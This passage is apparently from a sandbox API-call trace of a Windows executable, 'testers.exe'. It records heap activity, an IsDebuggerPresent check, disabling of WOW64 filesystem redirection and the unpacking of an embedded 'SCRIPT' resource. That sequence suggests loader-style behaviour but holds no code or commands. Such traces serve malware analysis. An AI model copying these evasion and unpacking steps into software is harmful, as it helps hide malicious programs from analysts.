lpMem=0xce53e0 | out: hHeap=0xcc0000) returned 1 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea6f0 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea708 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53f0 [0270.262] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6430 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea720 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5410 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea738 [0270.262] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea6f0 | out: hHeap=0xcc0000) returned 1 [0270.262] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53e0 | out: hHeap=0xcc0000) returned 1 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea6f0 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5420 [0270.262] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x214) returned 0xceaad8 [0270.263] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5430 [0270.263] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea750 [0270.263] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea6f0 | out: hHeap=0xcc0000) returned 1 [0270.263] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53e0 | out: hHeap=0xcc0000) returned 1 [0270.263] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3318 | out: hHeap=0xcc0000) returned 1 [0270.263] IsDebuggerPresent () returned 0 [0270.263] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8bfb68, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0270.263] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x8bfb68, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0270.264] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea628 | out: hHeap=0xcc0000) returned 1 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x60) returned 0xceacf8 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3318 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.264] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8bfb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0270.264] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3318 | out: hHeap=0xcc0000) returned 1 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x60) returned 0xcead60 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce64d0 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3318 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce64f8 [0270.264] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5440 [0270.264] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0270.265] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0270.265] Wow64DisableWow64FsRedirection (in: OldValue=0x8cfad4 | out: OldValue=0x8cfad4*=0x0) returned 1 [0270.265] FreeLibrary (hLibModule=0x75990000) returned 1 [0270.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cf970, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0270.265] GetFileType (hFile=0xf8) returned 0x1 [0270.265] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0270.267] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0270.267] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0270.267] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0270.267] FreeLibrary (hLibModule=0x75990000) returned 1 [0270.267] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10000) returned 0xceadc8 [0270.268] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5450 [0270.268] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x8cfb04 | out: ppstm=0x8cfb04*=0xce6520) returned 0x0 [0270.268] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0270.268] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0270.269] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0270.269] LockResource (hResData=0x3607b8) returned 0x3607b8 [0270.269] ISequentialStream:RemoteWrite (in: This=0xce6520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0270.269] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.269] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0xceadc8, cb=0x18, pcbRead=0x8cfa5c | out: pv=0xceadc8*=0xa3, pcbRead=0x8cfa5c*=0x18) returned 0x0 [0270.269] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfaa0, cb=0x4, pcbRead=0x8cfa5c | out: pv=0x8cfaa0*=0x45, pcbRead=0x8cfa5c*=0x4) returned 0x0 [0270.269] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5450 | out: hHeap=0xcc0000) returned 1 [0270.269] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceadc8 | out: hHeap=0xcc0000) returned 1 [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfac4, cb=0x10, pcbRead=0x8cfa9c | out: pv=0x8cfac4*=0x4d, pcbRead=0x8cfa9c*=0x10) returned 0x0 [0270.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf998 | out: lpSystemTimeAsFileTime=0x8cf998*(dwLowDateTime=0x4272f170, dwHighDateTime=0x1d661be)) [0270.269] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.269] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf418, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf418*=0x6b, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf420, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf420*=0xa6, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.269] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf208, cb=0x34, pcbRead=0x8cf1dc | out: pv=0x8cf208*=0xe1, pcbRead=0x8cf1dc*=0x34) returned 0x0 [0270.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf420, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf420*=0x17, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf44c, cb=0x6e, pcbRead=0x8cf1dc | out: pv=0x8cf44c*=0xf9, pcbRead=0x8cf1dc*=0x6e) returned 0x0 [0270.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.270] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf410, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf410*=0xbc, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.270] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf418, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf418*=0x6b, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf420, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf420*=0xaf, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf208, cb=0x26, pcbRead=0x8cf1dc | out: pv=0x8cf208*=0xe6, pcbRead=0x8cf1dc*=0x26) returned 0x0 [0270.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf420, cb=0x4, pcbRead=0x8cf1dc | out: pv=0x8cf420*=0x1b, pcbRead=0x8cf1dc*=0x4) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cf44c, cb=0x76, pcbRead=0x8cf1dc | out: pv=0x8cf44c*=0x6b, pcbRead=0x8cf1dc*=0x76) returned 0x0 [0270.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf0d8 | out: lpSystemTimeAsFileTime=0x8cf0d8*(dwLowDateTime=0x42731880, dwHighDateTime=0x1d661be)) [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfad3, cb=0x1, pcbRead=0x8cf424 | out: pv=0x8cfad3*=0x1, pcbRead=0x8cf424*=0x1) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfacc, cb=0x4, pcbRead=0x8cf424 | out: pv=0x8cfacc*=0x86, pcbRead=0x8cf424*=0x4) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfacc, cb=0x4, pcbRead=0x8cf424 | out: pv=0x8cfacc*=0xe4, pcbRead=0x8cf424*=0x4) returned 0x0 [0270.270] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0x8cfacc, cb=0x4, pcbRead=0x8cf424 | out: pv=0x8cfacc*=0x48, pcbRead=0x8cf424*=0x4) returned 0x0 [0270.271] IStream:RemoteSeek (in: This=0xce6520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.271] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x27c58) returned 0xd041e0 [0270.272] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x923a) returned 0xceadc8 [0270.272] ISequentialStream:RemoteRead (in: This=0xce6520, pv=0xceadc8, cb=0x923a, pcbRead=0x8cf424 | out: pv=0xceadc8*=0x6d, pcbRead=0x8cf424*=0x923a) returned 0x0 [0270.272] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf320 | out: lpSystemTimeAsFileTime=0x8cf320*(dwLowDateTime=0x427366a0, dwHighDateTime=0x1d661be)) [0270.274] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20000) returned 0xd2be40 [0270.274] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10000) returned 0xd4be48 [0270.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10000) returned 0xd5be50 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd2be40 | out: hHeap=0xcc0000) returned 1 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd4be48 | out: hHeap=0xcc0000) returned 1 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd5be50 | out: hHeap=0xcc0000) returned 1 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceadc8 | out: hHeap=0xcc0000) returned 1 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x82e4) returned 0xceadc8 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1c) returned 0xce6570 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce6570 | out: hHeap=0xcc0000) returned 1 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6570 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea6f0 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6598 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea768 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea6f0 | out: hHeap=0xcc0000) returned 1 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xa) returned 0xcea6f0 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea780 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5450 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea780 | out: hHeap=0xcc0000) returned 1 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5450 | out: hHeap=0xcc0000) returned 1 [0270.284] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea6f0 | out: hHeap=0xcc0000) returned 1 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea6f0 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1e) returned 0xce65c0 [0270.284] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea780 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce65e8 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5450 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce65c0 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea798 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea7b0 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea780 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea780 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea7c8 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea7e0 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea7f8 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5460 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea7c8 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea7c8 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea810 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea7e0 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea7e0 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea828 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea840 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea858 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5470 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea828 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea828 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea870 [0270.285] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea840 | out: hHeap=0xcc0000) returned 1 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea840 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5480 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea888 [0270.285] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea8a0 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf30d0 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5480 | out: hHeap=0xcc0000) returned 1 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea8b8 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea8d0 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea888 | out: hHeap=0xcc0000) returned 1 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcd22d0 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce6570 | out: hHeap=0xcc0000) returned 1 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea888 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x12) returned 0xcea628 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea8e8 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6570 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5480 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea628 | out: hHeap=0xcc0000) returned 1 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea900 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea918 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea8e8 | out: hHeap=0xcc0000) returned 1 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea8e8 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xa) returned 0xcea930 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea948 [0270.286] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf30e0 [0270.286] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea948 | out: hHeap=0xcc0000) returned 1 [0270.287] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf30e0 | out: hHeap=0xcc0000) returned 1 [0270.287] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea930 | out: hHeap=0xcc0000) returned 1 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea930 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea948 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xe) returned 0xcea960 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea978 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea990 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf30e0 [0270.287] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea960 | out: hHeap=0xcc0000) returned 1 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea960 [0270.287] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcea9a8 [0270.288] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea978 | out: hHeap=0xcc0000) returned 1 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea978 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea9c0 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xcf34b8 [0270.288] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd22d0 | out: hHeap=0xcc0000) returned 1 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea9d8 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea9f0 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xceaa08 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xceaa20 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf30f0 [0270.288] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea9f0 | out: hHeap=0xcc0000) returned 1 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcea9f0 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xceaa38 [0270.288] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa08 | out: hHeap=0xcc0000) returned 1 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xceaa08 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xceaa50 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xceaa68 [0270.288] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xe) returned 0xceaa80 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xceaa98 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xceaab0 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3100 [0270.289] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa80 | out: hHeap=0xcc0000) returned 1 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xceaa80 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3558 [0270.289] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa98 | out: hHeap=0xcc0000) returned 1 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xceaa98 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3570 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3588 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x14) returned 0xcea628 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf35a0 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce65c0 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3110 [0270.289] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea628 | out: hHeap=0xcc0000) returned 1 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35b8 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf35d0 [0270.289] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35a0 | out: hHeap=0xcc0000) returned 1 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35a0 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35e8 [0270.289] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3600 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3618 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3630 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3648 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3120 [0270.290] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3618 | out: hHeap=0xcc0000) returned 1 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3618 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3660 [0270.290] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3630 | out: hHeap=0xcc0000) returned 1 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3630 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3678 [0270.290] 